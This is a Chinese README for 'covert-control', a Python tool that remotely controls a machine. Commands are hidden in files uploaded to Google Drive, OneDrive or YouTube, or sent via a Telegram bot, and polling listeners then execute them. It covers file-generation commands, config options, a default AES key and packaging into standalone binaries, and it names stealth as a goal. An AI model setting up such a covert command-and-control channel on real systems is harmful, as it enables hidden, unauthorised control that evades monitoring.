通过将文件上传到 Google Drive、OneDrive、Youtube 或 Telegram 来远程控制系统,使用 Python 创建文件及监听器。支持创建文本文件、图像、音频或视频,命令可使用明文或 AES 加密。
covert-googledrive.py - 将文件上传至 Google Drive 的公共文件夹,控制系统。covert-onedrive.py - 将文件上传至 OneDrive 的公共文件夹,控制系统。covert-youtube.py - 将视频上传至 Youtube,控制系统(从 covert-tube 更新)。covert-telegram.py - 通过 Telegram 机器人控制系统。你可以在 test_files 文件夹中找到示例文件,或使用 generate_file.py 创建新文件:
python3 generate_file.py -t TYPE [-o OUTPUTFILE] [-c COMMAND] [-e]
-t (--type) [必填]:文件类型:"text"、"image"、"audio" 或 "video"。-o (--outputfile) [可选]:输出文件。-c (--command) [可选]:要执行的命令。-e (--encrypted) [可选]:添加此标志可使用 AES 加密命令。示例:
python3 generate_file.py -t text -c "whoami" -o text.txt
python3 generate_file.py -t text -c "whoami" -o text_encrypted.txt -e
python3 generate_file.py -t audio -c "whoami" -o audio.wav
python3 generate_file.py -t audio -c "whoami" -o audio_encrypted.wav -e
python3 generate_file.py -t image -c "whoami" -o image.png
python3 generate_file.py -t image -c "whoami" -o image_encrypted.png -e
python3 generate_file.py -t video -c "whoami" -o video.avi
python3 generate_file.py -t video -c "whoami" -o video_encrypted.avi -e
通用配置项:
data_type(可选,默认:"text"):
特定配置项:
covert-googledrive.py)。covert-onedrive.py)。covert-youtube.py)。covert-youtube.py)。covert-telegram.py)。允许通过上传文本文件、图像、音频和视频(未加密或 AES 加密)来执行命令。可选的输入参数是公共文件夹 URL,也可以在 config.py 中配置:
python3 covert-googledrive.py [FOLDER_URL]
默认情况下,监听器每 300 秒检查一次 Google Drive 文件夹(可在 config.py 中更新)。本例中上传了一个视频 "video.avi",命令包含在视频的二维码中:

发现文件夹中有新文件上传后,将其下载、处理并执行命令:

允许通过上传文本文件、图像、音频和视频(未加密或 AES 加密)来执行命令。可选的输入参数是公共文件夹 URL,也可以在 config.py 中配置:
python3 covert-onedrive.py [FOLDER_URL]
默认情况下,监听器每 300 秒检查一次 OneDrive 文件夹(可在 config.py 中更新)。本例中上传了一个音频文件 "audio_encrypted.wav",命令使用 AES 加密:

发现文件夹中有新文件上传后,将其下载、处理并执行命令:

注意:这仅在你未删除文件夹中的任何文件时才有效;如果删除了,你必须创建一个新的。理论上也可以实现在删除文件后仍然工作,但这需要发送大量请求,隐蔽性较差。
允许通过上传视频(未加密或 AES 加密)来执行命令。可选的输入参数是要监控的 Youtube 频道 ID 和 API 密钥,也可在 config.py 中配置:
python3 covert-youtube.py [CHANNEL_ID] [API_KEY]
默认情况下,监听器每 300 秒检查一次 Youtube 频道(可在 config.py 中更新)。首先上传视频:

发现频道中有新视频后,将其下载、处理并执行命令:

通过 Telegram 机器人远程控制系统。此选项不允许上传文件,但可以发送明文命令 (/cmd) 或 AES 加密命令 (/encrypted)。第一个可选输入参数是机器人令牌,也可在 config.py 中配置;第二个用于指定可以向机器人发送命令的单个 Telegram 用户(不带 "@"):
python3 covert-telegram.py [BOT_TOKEN] [TELEGRAM_USER]
监听器将检查聊天中的命令并显示输出:
/cmd CLEARTEXT_COMMAND
/encrypted AES_ENCRYPTED_COMMAND

sudo apt install libzbar0
pip install bs4 Pillow opencv-python pyqrcode pypng pyzbar youtube_dl pytesseract python-telegram-bot requests argparse pycryptodome
git clone https://github.com/ricardojoserf/covert-control && cd covert-control/
pyinstaller --onefile covert-googledrive.py
pyinstaller --onefile covert-onedrive.py
pyinstaller --onefile covert-telegram.py
pyinstaller --onefile covert-youtube.py
rm -rf build
rm *spec
ls dist/
| data_type | 文件类型 | 加密 | 适用平台 | 扩展名 |
|---|
| text | 文本文件 | 否 | Google Drive, OneDrive | .txt |
| text_encrypted | 文本文件 | 是 | Google Drive, OneDrive | .txt |
| image | 图像 | 否 | Google Drive, OneDrive | .png |
| image_encrypted | 图像 | 是 | Google Drive, OneDrive | .png |
| audio | 音频 | 否 | Google Drive, OneDrive | .wav |
| audio_encrypted | 音频 | 是 | Google Drive, OneDrive | .wav |
| video | 视频 | 否 | Google Drive, OneDrive, Youtube | .avi |
| video_encrypted | 视频 | 是 | Google Drive, OneDrive, Youtube | .avi |
delay_seconds(可选,默认:300):检查 Google Drive 或 OneDrive 文件夹中新上传文件或 Youtube 频道中新视频的间隔秒数。
aes_key(可选,默认:"covert-control21"):AES 加密密钥。
debug(可选,默认:True):是否在监听器中打印消息和时间戳。